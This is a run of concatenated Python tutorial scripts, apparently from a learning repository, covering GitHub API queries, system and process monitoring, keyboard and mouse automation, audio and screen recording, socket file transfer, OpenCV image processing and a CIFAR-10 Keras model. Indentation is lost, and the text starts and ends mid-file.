contents = repo.get_contents("test.txt")
repo.delete_file(contents.path, "remove test.txt", contents.sha)
import requests
from pprint import pprint
# github username
username = "x4nth055"
# url to request
url = f"https://api.github.com/users/{username}"
# make the request and return the json
user_data = requests.get(url).json()
# pretty print JSON data
pprint(user_data)
# get name
name = user_data["name"]
# get blog url if there is
blog = user_data["blog"]
# extract location
location = user_data["location"]
# get email address that is publicly available
email = user_data["email"]
# number of public repositories
public_repos = user_data["public_repos"]
# get number of public gists
public_gists = user_data["public_gists"]
# number of followers
followers = user_data["followers"]
# number of following
following = user_data["following"]
# date of account creation
date_created = user_data["created_at"]
# date of account last update
date_updated = user_data["updated_at"]
# urls
followers_url = user_data["followers_url"]
following_url = user_data["following_url"]
# print all
print("User:", username)
print("Name:", name)
print("Blog:", blog)
print("Location:", location)
print("Email:", email)
print("Total Public repositories:", public_repos)
print("Total Public Gists:", public_gists)
print("Total followers:", followers)
print("Total following:", following)
print("Date Created:", date_created)
print("Date Updated:", date_updated)
import base64
from github import Github
import sys
def print_repo(repo):
# repository full name
print("Full name:", repo.full_name)
# repository description
print("Description:", repo.description)
# the date of when the repo was created
print("Date created:", repo.created_at)
# the date of the last git push
print("Date of last push:", repo.pushed_at)
# home website (if available)
print("Home Page:", repo.homepage)
# programming language
print("Language:", repo.language)
# number of forks
print("Number of forks:", repo.forks)
# number of stars
print("Number of stars:", repo.stargazers_count)
print("-"*50)
# repository content (files & directories)
print("Contents:")
for content in repo.get_contents(""):
print(content)
try:
# repo license
print("License:", base64.b64decode(repo.get_license().content.encode()).decode())
except:
pass
# Github username from the command line
username = sys.argv[1]
# pygithub object
g = Github()
# get that user by username
user = g.get_user(username)
# iterate over all public repositories
for repo in user.get_repos():
print_repo(repo)
print("="*100)
from github import Github
import base64
def print_repo(repo):
# repository full name
print("Full name:", repo.full_name)
# repository description
print("Description:", repo.description)
# the date of when the repo was created
print("Date created:", repo.created_at)
# the date of the last git push
print("Date of last push:", repo.pushed_at)
# home website (if available)
print("Home Page:", repo.homepage)
# programming language
print("Language:", repo.language)
# number of forks
print("Number of forks:", repo.forks)
# number of stars
print("Number of stars:", repo.stargazers_count)
print("-"*50)
# repository content (files & directories)
print("Contents:")
for content in repo.get_contents(""):
print(content)
try:
# repo license
print("License:", base64.b64decode(repo.get_license().content.encode()).decode())
except:
pass
# your github account credentials
username = "username"
password = "password"
# initialize github object
g = Github(username, password)
# or use public version
# g = Github()
# search repositories by name
for repo in g.search_repositories("pythoncode tutorials"):
# print repository details
print_repo(repo)
print("="*100)
print("="*100)
print("="*100)
# search by programming language
for i, repo in enumerate(g.search_repositories("language:python")):
print_repo(repo)
print("="*100)
if i == 9:
break
import ipaddress
# initialize an IPv4 Address
ip = ipaddress.IPv4Address("192.168.1.1")
# print True if the IP address is global
print("Is global:", ip.is_global)
# print True if the IP address is link-local
print("Is link-local:", ip.is_link_local)
# ip.is_reserved
# ip.is_multicast
# next ip address
print(ip + 1)
# previous ip address
print(ip - 1)
# initialize an IPv4 Network
network = ipaddress.IPv4Network("192.168.1.0/24")
# get the network mask
print("Network mask:", network.netmask)
# get the broadcast address
print("Broadcast address:", network.broadcast_address)
# print the number of IP addresses under this network
print("Number of hosts under", str(network), ":", network.num_addresses)
# iterate over all the hosts under this network
print("Hosts under", str(network), ":")
for host in network.hosts():
print(host)
# iterate over the subnets of this network
print("Subnets:")
for subnet in network.subnets(prefixlen_diff=2):
print(subnet)
# get the supernet of this network
print("Supernet:", network.supernet(prefixlen_diff=1))
# prefixlen_diff: An integer, the amount the prefix length of
# the network should be decreased by. For example, given a
# /24 network and a prefixlen_diff of 3, a supernet with a
# /21 netmask is returned.
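# worked example (an illustrative addition, not in the original code): for the /24 network
# above, a prefixlen_diff of 1 returns its /23 parent network
# network.supernet(prefixlen_diff=1)  # IPv4Network('192.168.0.0/23')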
# tell if this network is under (or overlaps) 192.168.0.0/16
print("Overlaps 192.168.0.0/16:", network.overlaps(ipaddress.IPv4Network("192.168.0.0/16")))
import keyboard
# registering a hotkey that replaces one typed text with another
# replaces every "email" followed by a space with my actual email
keyboard.add_abbreviation("email", "rockikzthepythoncode.com")
# invokes a callback everytime a hotkey is pressed
keyboard.add_hotkey("ctrl+alt+p", lambda: print("CTRL+ALT+P Pressed!"))
# check if a ctrl is pressed
print(keyboard.is_pressed('ctrl'))
# press space
keyboard.send("space")
# sends artificial keyboard events to the OS
# simulating the typing of a given text
# setting 0.1 seconds to wait between keypresses to look fancy
keyboard.write("Python Programming is always fun!", delay=0.1)
# record all keyboard clicks until esc is clicked
events = keyboard.record('esc')
# play these events
keyboard.play(events)
# remove all keyboard hooks in use
keyboard.unhook_all()
from fbchat import Client
from fbchat.models import Message, MessageReaction
# facebook user credentials
username = "username.or.email"
password = "password"
# login
client = Client(username, password)
# get 20 users you most recently talked to
users = client.fetchThreadList()
print(users)
# get the detailed informations about these users
detailed_users = [ list(client.fetchThreadInfo(user.uid).values())[0] for user in users ]
# sort by number of messages
sorted_detailed_users = sorted(detailed_users, key=lambda u: u.message_count, reverse=True)
# print the best friend!
best_friend = sorted_detailed_users[0]
print("Best friend:", best_friend.name, "with a message count of", best_friend.message_count)
# message the best friend!
client.send(Message(
text=f"Congratulations {best_friend.name}, you are my best friend with {best_friend.message_count} messages!"
),
thread_id=best_friend.uid)
# get all users you talked to in messenger in your account
all_users = client.fetchAllUsers()
print("You talked with a total of", len(all_users), "users!")
# let's logout
client.logout()
import mouse
# left click
mouse.click('left')
# right click
mouse.click('right')
# middle click
mouse.click('middle')
# get the position of mouse
print(mouse.get_position())
# In [12]: mouse.get_position()
# Out[12]: (714, 488)
# presses but doesn't release
mouse.hold('left')
# mouse.press('left')
# drag from (0, 0) to (100, 100) relatively with a duration of 0.1s
mouse.drag(0, 0, 100, 100, absolute=False, duration=0.1)
# whether a button is clicked
print(mouse.is_pressed('right'))
# move 100 right & 100 down
mouse.move(100, 100, absolute=False, duration=0.2)
# make a listener when left button is clicked
mouse.on_click(lambda: print("Left Button clicked."))
# make a listener when right button is clicked
mouse.on_right_click(lambda: print("Right Button clicked."))
# remove the listeners when you want
mouse.unhook_all()
# scroll down
mouse.wheel(-1)
# scroll up
mouse.wheel(1)
# record until you click right
events = mouse.record()
# replay these events
mouse.play(events[:-1])
import pickle
# define any Python data structure including lists, sets, tuples, dicts, etc.
l = list(range(10000))
# save it to a file
with open("list.pickle", "wb") as file:
pickle.dump(l, file)
# load it again
with open("list.pickle", "rb") as file:
unpickled_l = pickle.load(file)
print("unpickled_l == l: ", unpickled_l == l)
print("unpickled l is l: ", unpickled_l is l)
import pickle
class Person:
def __init__(self, first_name, last_name, age, gender):
self.first_name = first_name
self.last_name = last_name
self.age = age
self.gender = gender
def __str__(self):
return f"<Person name={self.first_name} {self.last_name}, age={self.age}, gender={self.gender}>"
p = Person("John", "Doe", 99, "Male")
# save the object
with open("person.pickle", "wb") as file:
pickle.dump(p, file)
# load the object
with open("person.pickle", "rb") as file:
p2 = pickle.load(file)
print(p)
print(p2)
import pickle
class Person:
def __init__(self, first_name, last_name, age, gender):
self.first_name = first_name
self.last_name = last_name
self.age = age
self.gender = gender
def __str__(self):
return f"<Person name={self.first_name} {self.last_name}, age={self.age}, gender={self.gender}>"
p = Person("John", "Doe", 99, "Male")
# get the dumped bytes
dumped_p = pickle.dumps(p)
print(dumped_p)
# write them to a file
with open("person.pickle", "wb") as file:
file.write(dumped_p)
# load it
with open("person.pickle", "rb") as file:
p2 = pickle.loads(file.read())
print(p)
print(p2)
import camelot
import sys
# PDF file to extract tables from (from command-line)
file = sys.argv[1]
# extract all the tables in the PDF file
tables = camelot.read_pdf(file)
# number of tables extracted
print("Total tables extracted:", tables.n)
# print the first table as Pandas DataFrame
print(tables[0].df)
# export individually
tables[0].to_csv("foo.csv")
# or export all in a zip
tables.export("foo.csv", f="csv", compress=True)
# export to HTML
tables.export("foo.html", f="html")
import psutil
from datetime import datetime
import pandas as pd
import time
import os
def get_size(bytes):
"""
Returns size of bytes in a nice format
"""
for unit in ['', 'K', 'M', 'G', 'T', 'P']:
if bytes < 1024:
return f"{bytes:.2f}{unit}B"
bytes /= 1024
def get_processes_info():
# the list that will contain all process dictionaries
processes = []
for process in psutil.process_iter():
# get all process info in one shot
with process.oneshot():
# get the process id
pid = process.pid
if pid == 0:
# System Idle Process for Windows NT, useless to see anyways
continue
# get the name of the file executed
name = process.name()
# get the time the process was spawned
try:
create_time = datetime.fromtimestamp(process.create_time())
except OSError:
# system processes, using boot time instead
create_time = datetime.fromtimestamp(psutil.boot_time())
try:
# get the number of CPU cores that can execute this process
cores = len(process.cpu_affinity())
except psutil.AccessDenied:
cores = 0
# get the CPU usage percentage
cpu_usage = process.cpu_percent()
# get the status of the process (running, idle, etc.)
status = process.status()
try:
# get the process priority (a lower value means a more prioritized process)
nice = int(process.nice())
except psutil.AccessDenied:
nice = 0
try:
# get the memory usage in bytes
memory_usage = process.memory_full_info().uss
except psutil.AccessDenied:
memory_usage = 0
# total process read and written bytes
io_counters = process.io_counters()
read_bytes = io_counters.read_bytes
write_bytes = io_counters.write_bytes
# get the number of total threads spawned by this process
n_threads = process.num_threads()
# get the username of the user that spawned the process
try:
username = process.username()
except psutil.AccessDenied:
username = "N/A"
processes.append({
'pid': pid, 'name': name, 'create_time': create_time,
'cores': cores, 'cpu_usage': cpu_usage, 'status': status, 'nice': nice,
'memory_usage': memory_usage, 'read_bytes': read_bytes, 'write_bytes': write_bytes,
'n_threads': n_threads, 'username': username,
})
return processes
def construct_dataframe(processes):
# convert to pandas dataframe
df = pd.DataFrame(processes)
# set the process id as index of a process
df.set_index('pid', inplace=True)
# sort rows by the column passed as argument
df.sort_values(sort_by, inplace=True, ascending=not descending)
# pretty printing bytes
df['memory_usage'] = df['memory_usage'].apply(get_size)
df['write_bytes'] = df['write_bytes'].apply(get_size)
df['read_bytes'] = df['read_bytes'].apply(get_size)
# convert to proper date format
df['create_time'] = df['create_time'].apply(datetime.strftime, args=("%Y-%m-%d %H:%M:%S",))
# reorder and define used columns
df = df[columns.split(",")]
return df
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Process Viewer & Monitor")
parser.add_argument("-c", "--columns", help="""Columns to show,
available are name,create_time,cores,cpu_usage,status,nice,memory_usage,read_bytes,write_bytes,n_threads,username.
Default is name,cpu_usage,memory_usage,read_bytes,write_bytes,status,create_time,nice,n_threads,cores.""",
default="name,cpu_usage,memory_usage,read_bytes,write_bytes,status,create_time,nice,n_threads,cores")
parser.add_argument("-s", "--sort-by", dest="sort_by", help="Column to sort by, default is memory_usage .", default="memory_usage")
parser.add_argument("--descending", action="store_true", help="Whether to sort in descending order.")
parser.add_argument("-n", help="Number of processes to show, will show all if 0 is specified, default is 25 .", default=25)
parser.add_argument("-u", "--live-update", action="store_true", help="Whether to keep the program on and updating process information each second")
# parse arguments
args = parser.parse_args()
columns = args.columns
sort_by = args.sort_by
descending = args.descending
n = int(args.n)
live_update = args.live_update
# print the processes for the first time
processes = get_processes_info()
df = construct_dataframe(processes)
if n == 0:
print(df.to_string())
elif n > 0:
print(df.head(n).to_string())
# print continuously
while live_update:
# get all process info
processes = get_processes_info()
df = construct_dataframe(processes)
# clear the screen depending on your OS
os.system("cls") if "nt" in os.name else os.system("clear")
if n == 0:
print(df.to_string())
elif n > 0:
print(df.head(n).to_string())
time.sleep(0.7)
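# Hypothetical invocations of the process monitor above (the script name is an assumption),
# using the argparse options defined in __main__:
#   python process_monitor.py                                      # 25 rows sorted by memory_usage
#   python process_monitor.py -c name,cpu_usage -s cpu_usage --descending -n 10 -u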
from playsound import playsound
import sys
playsound(sys.argv[1])
import pyaudio
import wave
import sys
filename = sys.argv[1]
# set the chunk size of 1024 samples
chunk = 1024
# open the audio file
wf = wave.open(filename, "rb")
# initialize PyAudio object
p = pyaudio.PyAudio()
# open stream object
stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),
channels=wf.getnchannels(),
rate=wf.getframerate(),
output=True)
# read data in chunks
data = wf.readframes(chunk)
# writing to the stream (playing audio)
while data:
stream.write(data)
data = wf.readframes(chunk)
# close stream
stream.close()
p.terminate()
from pydub import AudioSegment
from pydub.playback import play
import sys
# read MP3 file
song = AudioSegment.from_mp3(sys.argv[1])
# song = AudioSegment.from_wav("audio_file.wav")
# you can also read from other formats such as MP4
# song = AudioSegment.from_file("audio_file.mp4", "mp4")
play(song)
import pyaudio
import wave
import argparse
parser = argparse.ArgumentParser(description="an Audio Recorder using Python")
parser.add_argument("-o", "--output", help="Output file (with .wav)", default="recorded.wav")
parser.add_argument("-d", "--duration", help="Duration to record in seconds (can be float)", default=5)
args = parser.parse_args()
# the file name output you want to record into
filename = args.output
# number of seconds to record
record_seconds = float(args.duration)
# set the chunk size of 1024 samples
chunk = 1024
# sample format
FORMAT = pyaudio.paInt16
# mono, change to 2 if you want stereo
channels = 1
# 44100 samples per second
sample_rate = 44100
# initialize PyAudio object
p = pyaudio.PyAudio()
# open stream object as input & output
stream = p.open(format=FORMAT,
channels=channels,
rate=sample_rate,
input=True,
output=True,
frames_per_buffer=chunk)
frames = []
print("Recording...")
for i in range(int(sample_rate / chunk * record_seconds)):
data = stream.read(chunk)
# if you want to hear your voice while recording
# stream.write(data)
frames.append(data)
print("Finished recording.")
# stop and close stream
stream.stop_stream()
stream.close()
# terminate pyaudio object
p.terminate()
# save audio file
# open the file in 'write bytes' mode
wf = wave.open(filename, "wb")
# set the channels
wf.setnchannels(channels)
# set the sample format
wf.setsampwidth(p.get_sample_size(FORMAT))
# set the sample rate
wf.setframerate(sample_rate)
# write the frames as bytes
wf.writeframes(b"".join(frames))
# close the file
wf.close()
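# Hypothetical usage of the recorder above (the script name is an assumption); -o and -d
# default to recorded.wav and 5 seconds as defined in the argparse setup:
#   python record_audio.py -o my_recording.wav -d 10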
import cv2
import numpy as np
import pyautogui
# display screen resolution, get it from your OS settings
SCREEN_SIZE = (1920, 1080)
# define the codec
fourcc = cv2.VideoWriter_fourcc(*"MJPG")
# create the video write object
out = cv2.VideoWriter("output.avi", fourcc, 10.0, (SCREEN_SIZE))
# while True:
for i in range(100):
# make a screenshot
img = pyautogui.screenshot()
# convert these pixels to a proper numpy array to work with OpenCV
frame = np.array(img)
# convert colors from RGB (pyautogui/Pillow) to BGR (the channel order OpenCV expects)
frame = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)
# write the frame
out.write(frame)
# show the frame
# cv2.imshow("screenshot", frame)
# if the user presses q, exit (only effective while the imshow window above is enabled)
if cv2.waitKey(1) == ord("q"):
break
# make sure everything is closed when exited
cv2.destroyAllWindows()
out.release()
import psutil
import platform
from datetime import datetime
def get_size(bytes, suffix="B"):
"""
Scale bytes to its proper format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
print("="*40, "System Information", "="*40)
uname = platform.uname()
print(f"System: {uname.system}")
print(f"Node Name: {uname.node}")
print(f"Release: {uname.release}")
print(f"Version: {uname.version}")
print(f"Machine: {uname.machine}")
print(f"Processor: {uname.processor}")
# Boot Time
print("="*40, "Boot Time", "="*40)
boot_time_timestamp = psutil.boot_time()
bt = datetime.fromtimestamp(boot_time_timestamp)
print(f"Boot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}")
# let's print CPU information
print("="*40, "CPU Info", "="*40)
# number of cores
print("Physical cores:", psutil.cpu_count(logical=False))
print("Total cores:", psutil.cpu_count(logical=True))
# CPU frequencies
cpufreq = psutil.cpu_freq()
print(f"Max Frequency: {cpufreq.max:.2f}Mhz")
print(f"Min Frequency: {cpufreq.min:.2f}Mhz")
print(f"Current Frequency: {cpufreq.current:.2f}Mhz")
# CPU usage
print("CPU Usage Per Core:")
for i, percentage in enumerate(psutil.cpu_percent(percpu=True, interval=1)):
print(f"Core {i}: {percentage}%")
print(f"Total CPU Usage: {psutil.cpu_percent()}%")
# Memory Information
print("="*40, "Memory Information", "="*40)
# get the memory details
svmem = psutil.virtual_memory()
print(f"Total: {get_size(svmem.total)}")
print(f"Available: {get_size(svmem.available)}")
print(f"Used: {get_size(svmem.used)}")
print(f"Percentage: {svmem.percent}%")
print("="*20, "SWAP", "="*20)
# get the swap memory details (if exists)
swap = psutil.swap_memory()
print(f"Total: {get_size(swap.total)}")
print(f"Free: {get_size(swap.free)}")
print(f"Used: {get_size(swap.used)}")
print(f"Percentage: {swap.percent}%")
# Disk Information
print("="*40, "Disk Information", "="*40)
print("Partitions and Usage:")
# get all disk partitions
partitions = psutil.disk_partitions()
for partition in partitions:
print(f"=== Device: {partition.device} ===")
print(f" Mountpoint: {partition.mountpoint}")
print(f" File system type: {partition.fstype}")
try:
partition_usage = psutil.disk_usage(partition.mountpoint)
except PermissionError:
# this can be raised when the disk isn't ready
continue
print(f" Total Size: {get_size(partition_usage.total)}")
print(f" Used: {get_size(partition_usage.used)}")
print(f" Free: {get_size(partition_usage.free)}")
print(f" Percentage: {partition_usage.percent}%")
# get IO statistics since boot
disk_io = psutil.disk_io_counters()
print(f"Total read: {get_size(disk_io.read_bytes)}")
print(f"Total write: {get_size(disk_io.write_bytes)}")
# Network information
print("="*40, "Network Information", "="*40)
# get all network interfaces (virtual and physical)
if_addrs = psutil.net_if_addrs()
for interface_name, interface_addresses in if_addrs.items():
for address in interface_addresses:
print(f"=== Interface: {interface_name} ===")
if str(address.family) == 'AddressFamily.AF_INET':
print(f" IP Address: {address.address}")
print(f" Netmask: {address.netmask}")
print(f" Broadcast IP: {address.broadcast}")
elif str(address.family) == 'AddressFamily.AF_PACKET':
print(f" MAC Address: {address.address}")
print(f" Netmask: {address.netmask}")
print(f" Broadcast MAC: {address.broadcast}")
# get IO statistics since boot
net_io = psutil.net_io_counters()
print(f"Total Bytes Sent: {get_size(net_io.bytes_sent)}")
print(f"Total Bytes Received: {get_size(net_io.bytes_recv)}")
from qbittorrent import Client
# connect to the qbittorent Web UI
qb = Client("http://127.0.0.1:8080/")
# put the credentials (as you configured)
qb.login("admin", "adminadmin")
# open the torrent file of the file you wanna download
torrent_file = open("debian-10.2.0-amd64-netinst.iso.torrent", "rb")
# start downloading
qb.download_from_file(torrent_file)
# this magnet is not valid, replace with yours
# magnet_link = "magnet:?xt=urn:btih:e334ab9ddd91c10938a7....."
# qb.download_from_link(magnet_link)
# you can specify the save path for downloads
# qb.download_from_file(torrent_file, savepath="/the/path/you/want/to/save")
# pause all downloads
qb.pause_all()
# resume them
qb.resume_all()
def get_size_format(b, factor=1024, suffix="B"):
"""
Scale bytes to its proper byte format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
if b < factor:
return f"{b:.2f}{unit}{suffix}"
b /= factor
return f"{b:.2f}Y{suffix}"
# return list of torrents
torrents = qb.torrents()
for torrent in torrents:
print("Torrent name:", torrent["name"])
print("hash:", torrent["hash"])
print("Seeds:", torrent["num_seeds"])
print("File size:", get_size_format(torrent["total_size"]))
print("Download speed:", get_size_format(torrent["dlspeed"]) + "/s")
# Torrent name: debian-10.2.0-amd64-netinst.iso
# hash: 86d4c80024a469be4c50bc5a102cf71780310074
# Seeds: 70
# File size: 335.00MB
# Download speed: 606.15KB/s
"""
Client that sends the file (uploads)
"""
import socket
import tqdm
import os
import argparse
SEPARATOR = "<SEPARATOR>"
BUFFER_SIZE = 1024 * 4
def send_file(filename, host, port):
# get the file size
filesize = os.path.getsize(filename)
# create the client socket
s = socket.socket()
print(f"[+] Connecting to {host}:{port}")
s.connect((host, port))
print("[+] Connected.")
# send the filename and filesize
s.send(f"{filename}{SEPARATOR}{filesize}".encode())
# start sending the file
progress = tqdm.tqdm(range(filesize), f"Sending {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "rb") as f:
for _ in progress:
# read the bytes from the file
bytes_read = f.read(BUFFER_SIZE)
if not bytes_read:
# file transmitting is done
break
# we use sendall to ensure complete transmission
# over busy networks
s.sendall(bytes_read)
# update the progress bar
progress.update(len(bytes_read))
# close the socket
s.close()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Simple File Sender")
parser.add_argument("file", help="File name to send")
parser.add_argument("host", help="The host/IP address of the receiver")
parser.add_argument("-p", "--port", help="Port to use, default is 5001", default=5001)
args = parser.parse_args()
filename = args.file
host = args.host
port = args.port
send_file(filename, host, port)
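# A hypothetical invocation of the sender above (script name, file and address are assumptions),
# matching the positional "file" and "host" arguments and the -p port option:
#   python sender.py data.csv 192.168.1.101 -p 5001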
"""
Server receiver of the file
"""
import socket
import tqdm
import os
# device's IP address
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5001
# receive 4096 bytes each time
BUFFER_SIZE = 4096
SEPARATOR = "<SEPARATOR>"
# create the server socket
# TCP socket
s = socket.socket()
# bind the socket to our local address
s.bind((SERVER_HOST, SERVER_PORT))
# enabling our server to accept connections
# 5 here is the number of unaccepted connections that
# the system will allow before refusing new connections
s.listen(5)
print(f"[*] Listening as {SERVER_HOST}:{SERVER_PORT}")
# accept connection if there is any
client_socket, address = s.accept()
# if the code below executes, the sender has connected
print(f"[+] {address} is connected.")
# receive the file infos
# receive using client socket, not server socket
received = client_socket.recv(BUFFER_SIZE).decode()
filename, filesize = received.split(SEPARATOR)
# remove absolute path if there is
filename = os.path.basename(filename)
# convert to integer
filesize = int(filesize)
# start receiving the file from the socket
# and writing to the file stream
progress = tqdm.tqdm(range(filesize), f"Receiving {filename}", unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for _ in progress:
# read BUFFER_SIZE bytes from the socket (receive)
bytes_read = client_socket.recv(BUFFER_SIZE)
if not bytes_read:
# nothing is received
# file transmitting is done
break
# write to the file the bytes we just received
f.write(bytes_read)
# update the progress bar
progress.update(len(bytes_read))
# close the client socket
client_socket.close()
# close the server socket
s.close()
import requests
import sys
# get the API KEY here: https://developers.google.com/custom-search/v1/overview
API_KEY = "<INSERT_YOUR_API_KEY_HERE>"
# get your Search Engine ID on your CSE control panel
SEARCH_ENGINE_ID = "<INSERT_YOUR_SEARCH_ENGINE_ID_HERE>"
# the search query you want, from the command line
query = sys.argv[1]
# constructing the URL
# doc: https://developers.google.com/custom-search/v1/using_rest
url = f"https://www.googleapis.com/customsearch/v1?key={API_KEY}&cx={SEARCH_ENGINE_ID}&q={query}"
# make the API request
data = requests.get(url).json()
# get the result items
search_items = data.get("items")
# iterate over 10 results found
for i, search_item in enumerate(search_items, start=1):
# get the page title
title = search_item.get("title")
# page snippet
snippet = search_item.get("snippet")
# alternatively, you can get the HTML snippet (bolded keywords)
html_snippet = search_item.get("htmlSnippet")
# extract the page url
link = search_item.get("link")
# print the results
print("="*10, f"Result #{i}", "="*10)
print("Title:", title)
print("Description:", snippet)
print("URL:", link, "\n")
import cv2
import matplotlib.pyplot as plt
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert to RGB
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
# convert to grayscale
gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
# create a binary thresholded image
_, binary = cv2.threshold(gray, int(sys.argv[2]), 255, cv2.THRESH_BINARY_INV)
# show it
plt.imshow(binary, cmap="gray")
plt.show()
# find the contours from the thresholded image
contours, hierarchy = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# draw all contours
image = cv2.drawContours(image, contours, -1, (0, 255, 0), 2)
# show the image with the drawn contours
plt.imshow(image)
plt.show()
import cv2
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
# convert to grayscale
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# create a binary thresholded image
_, binary = cv2.threshold(gray, 255 // 2, 255, cv2.THRESH_BINARY_INV)
# find the contours from the thresholded image
contours, hierarchy = cv2.findContours(binary, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# draw all contours
image = cv2.drawContours(frame, contours, -1, (0, 255, 0), 2)
# show the images
cv2.imshow("gray", gray)
cv2.imshow("image", image)
cv2.imshow("binary", binary)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
import numpy as np
import matplotlib.pyplot as plt
import sys
# read the image
image = cv2.imread(sys.argv[1])
# convert it to grayscale
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# to show the grayscale image, uncomment the 2 lines below
# plt.imshow(gray, cmap="gray")
# plt.show()
# perform the canny edge detector to detect image edges
edges = cv2.Canny(gray, threshold1=30, threshold2=100)
# show the detected edges
plt.imshow(edges, cmap="gray")
plt.show()
import numpy as np
import cv2
cap = cv2.VideoCapture(0)
while True:
_, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray, 30, 100)
cv2.imshow("edges", edges)
cv2.imshow("gray", gray)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
import cv2
# loading the test image
image = cv2.imread("kids.jpg")
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_frontalface_default.xml")
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# print the number of faces detected
print(f"{len(faces)} faces detected in the image.")
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
# save the image with rectangles
cv2.imwrite("kids_detected.jpg", image)
import cv2
# create a new cam object
cap = cv2.VideoCapture(0)
# initialize the face recognizer (default face haar cascade)
face_cascade = cv2.CascadeClassifier("cascades/haarcascade_frontalface_default.xml")
while True:
# read the image from the cam
_, image = cap.read()
# converting to grayscale
image_gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect all the faces in the image
faces = face_cascade.detectMultiScale(image_gray, 1.3, 5)
# for every face, draw a blue rectangle
for x, y, width, height in faces:
cv2.rectangle(image, (x, y), (x + width, y + height), color=(255, 0, 0), thickness=2)
cv2.imshow("image", image)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
from train import load_data, batch_size
from tensorflow.keras.models import load_model
import matplotlib.pyplot as plt
import numpy as np
# CIFAR-10 classes
categories = {
0: "airplane",
1: "automobile",
2: "bird",
3: "cat",
4: "deer",
5: "dog",
6: "frog",
7: "horse",
8: "ship",
9: "truck"
}
# load the testing set
# (_, _), (X_test, y_test) = load_data()
ds_train, ds_test, info = load_data()
# load the model with final model weights
model = load_model("results/cifar10-model-v1.h5")
# evaluation
loss, accuracy = model.evaluate(ds_test, steps=info.splits["test"].num_examples // batch_size)
print("Test accuracy:", accuracy*100, "%")
# get prediction for this image
data_sample = next(iter(ds_test))
sample_image = data_sample[0].numpy()[0]
sample_label = categories[data_sample[1].numpy()[0]]
prediction = np.argmax(model.predict(sample_image.reshape(-1, *sample_image.shape))[0])
print("Predicted label:", categories[prediction])
print("True label:", sample_label)
# show the first image
plt.axis('off')
plt.imshow(sample_image)
plt.show()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Activation, Flatten
from tensorflow.keras.layers import Conv2D, MaxPooling2D
from tensorflow.keras.callbacks import TensorBoard
import tensorflow as tf
import tensorflow_datasets as tfds
import os
# hyper-parameters
batch_size = 64
# 10 categories of images (CIFAR-10)
num_classes = 10
# number of training epochs
epochs = 30
def create_model(input_shape):
"""
Constructs the model:
- 32 Convolutional (3x3)
- Relu
- 32 Convolutional (3x3)
- Relu
- Max pooling (2x2)
- Dropout
- 64 Convolutional (3x3)
- Relu
- 64 Convolutional (3x3)
- Relu
- Max pooling (2x2)
- Dropout
- 128 Convolutional (3x3)
- Relu
- 128 Convolutional (3x3)
- Relu
- Max pooling (2x2)
- Dropout
- Flatten (To make a 1D vector out of convolutional layers)
- 1024 Fully connected units
- Relu
- Dropout
- 10 Fully connected units (each corresponds to a label category (cat, dog, etc.))
"""
# building the model
model = Sequential()
model.add(Conv2D(filters=32, kernel_size=(3, 3), padding="same", input_shape=input_shape))
model.add(Activation("relu"))
model.add(Conv2D(filters=32, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(filters=64, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=64, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Conv2D(filters=128, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(Conv2D(filters=128, kernel_size=(3, 3), padding="same"))
model.add(Activation("relu"))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
# flattening the convolutions
model.add(Flatten())
# fully-connected layers
model.add(Dense(1024))
model.add(Activation("relu"))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation="softmax"))
# print the summary of the model architecture
model.summary()
# training the model using adam optimizer
model.compile(loss="sparse_categorical_crossentropy", optimizer="adam", metrics=["accuracy"])
return model
def load_data():
"""
This function loads CIFAR-10 dataset, and preprocess it
"""
# Loading data using Keras
# loading the CIFAR-10 dataset, split between train and test sets
# (X_train, y_train), (X_test, y_test) = cifar10.load_data()
# print("Training samples:", X_train.shape[0])
# print("Testing samples:", X_test.shape[0])
# print(f"Images shape: {X_train.shape[1:]}")
# # converting image labels to binary class matrices
# y_train = to_categorical(y_train, num_classes)
